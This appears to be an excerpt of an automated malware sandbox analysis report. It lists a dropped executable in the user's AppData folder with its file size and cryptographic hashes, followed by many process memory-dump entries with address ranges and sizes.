                                • C:\Users\Admin\AppData\Roaming\yu.exe

                                  Filesize

                                  4.0MB

                                  MD5

                                  da70d0aab8cad0887e5e9b5174c9d87d

                                  SHA1

                                  af5096c0b9fd4f4926850c4479c8e0e0eac8c91b

                                  SHA256

                                  6617c1ab08b88711538b600fc4c5cf76098088b436185f5590cdb0e1fc1f6b13

                                  SHA512

                                  c100a08bccfa00dcf93160b6174940db1b6839aafbbaec8caa25c4c0e004c96aebf243552df85b7dff56915401bfcb0ecb9caa9bce2edf0d29a9b52c849ebcc5

                                • C:\Users\Admin\AppData\Roaming\yu.exe

                                  Filesize

                                  4.0MB

                                  MD5

                                  da70d0aab8cad0887e5e9b5174c9d87d

                                  SHA1

                                  af5096c0b9fd4f4926850c4479c8e0e0eac8c91b

                                  SHA256

                                  6617c1ab08b88711538b600fc4c5cf76098088b436185f5590cdb0e1fc1f6b13

                                  SHA512

                                  c100a08bccfa00dcf93160b6174940db1b6839aafbbaec8caa25c4c0e004c96aebf243552df85b7dff56915401bfcb0ecb9caa9bce2edf0d29a9b52c849ebcc5

                                • memory/60-241-0x0000000000530000-0x0000000001308000-memory.dmp

                                  Filesize

                                  13.8MB

                                • memory/60-265-0x0000000000530000-0x0000000001308000-memory.dmp

                                  Filesize

                                  13.8MB

                                • memory/60-263-0x0000000000530000-0x0000000001308000-memory.dmp

                                  Filesize

                                  13.8MB

                                • memory/516-245-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/516-325-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/516-232-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/788-221-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/788-226-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1216-237-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1216-262-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4056-218-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4056-217-0x0000000000890000-0x0000000000968000-memory.dmp

                                  Filesize

                                  864KB

                                • memory/4056-222-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4180-167-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4180-171-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4440-130-0x0000000000E80000-0x00000000013AA000-memory.dmp

                                  Filesize

                                  5.2MB

                                • memory/4440-131-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4440-136-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4560-158-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4560-142-0x000000001E100000-0x000000001E176000-memory.dmp

                                  Filesize

                                  472KB

                                • memory/4560-143-0x000000001E0B0000-0x000000001E0CE000-memory.dmp

                                  Filesize

                                  120KB

                                • memory/4560-141-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4788-216-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4964-145-0x000001A6AA620000-0x000001A6AA642000-memory.dmp

                                  Filesize

                                  136KB

                                • memory/4964-146-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4964-154-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/5036-163-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/5036-159-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/157364-261-0x0000000000E80000-0x0000000001421000-memory.dmp

                                  Filesize

                                  5.6MB

                                • memory/157364-247-0x0000000000E80000-0x0000000001421000-memory.dmp

                                  Filesize

                                  5.6MB

                                • memory/158780-314-0x0000000000F70000-0x000000000149A000-memory.dmp

                                  Filesize

                                  5.2MB

                                • memory/158780-312-0x0000000000F70000-0x000000000149A000-memory.dmp

                                  Filesize

                                  5.2MB

                                • memory/158780-316-0x0000000000F70000-0x000000000149A000-memory.dmp

                                  Filesize

                                  5.2MB

                                • memory/190772-179-0x0000000005B90000-0x00000000061A8000-memory.dmp

                                  Filesize

                                  6.1MB

                                • memory/190772-212-0x0000000007820000-0x0000000007D4C000-memory.dmp

                                  Filesize

                                  5.2MB

                                • memory/190772-174-0x0000000000400000-0x0000000000420000-memory.dmp

                                  Filesize

                                  128KB

                                • memory/190772-180-0x00000000055D0000-0x00000000055E2000-memory.dmp

                                  Filesize

                                  72KB

                                • memory/190772-181-0x0000000005700000-0x000000000580A000-memory.dmp

                                  Filesize

                                  1.0MB

                                • memory/190772-182-0x0000000005630000-0x000000000566C000-memory.dmp

                                  Filesize

                                  240KB

                                • memory/190772-203-0x0000000006760000-0x0000000006D04000-memory.dmp

                                  Filesize

                                  5.6MB

                                • memory/190772-204-0x0000000005AD0000-0x0000000005B62000-memory.dmp

                                  Filesize

                                  584KB

                                • memory/190772-211-0x0000000007120000-0x00000000072E2000-memory.dmp

                                  Filesize

                                  1.8MB

                                • memory/190772-229-0x0000000007640000-0x0000000007690000-memory.dmp

                                  Filesize

                                  320KB

                                • memory/190772-207-0x0000000006660000-0x000000000667E000-memory.dmp

                                  Filesize

                                  120KB

                                • memory/190772-206-0x00000000065E0000-0x0000000006656000-memory.dmp

                                  Filesize

                                  472KB

                                • memory/190772-205-0x00000000061B0000-0x0000000006216000-memory.dmp

                                  Filesize

                                  408KB

                                • memory/191072-186-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/191072-192-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/191180-196-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/191180-191-0x00000000001E0000-0x0000000000270000-memory.dmp

                                  Filesize

                                  576KB

                                • memory/191180-190-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/191424-202-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/191424-227-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/191424-326-0x00007FFE88E10000-0x00007FFE898D1000-memory.dmp

                                  Filesize

                                  10.8MB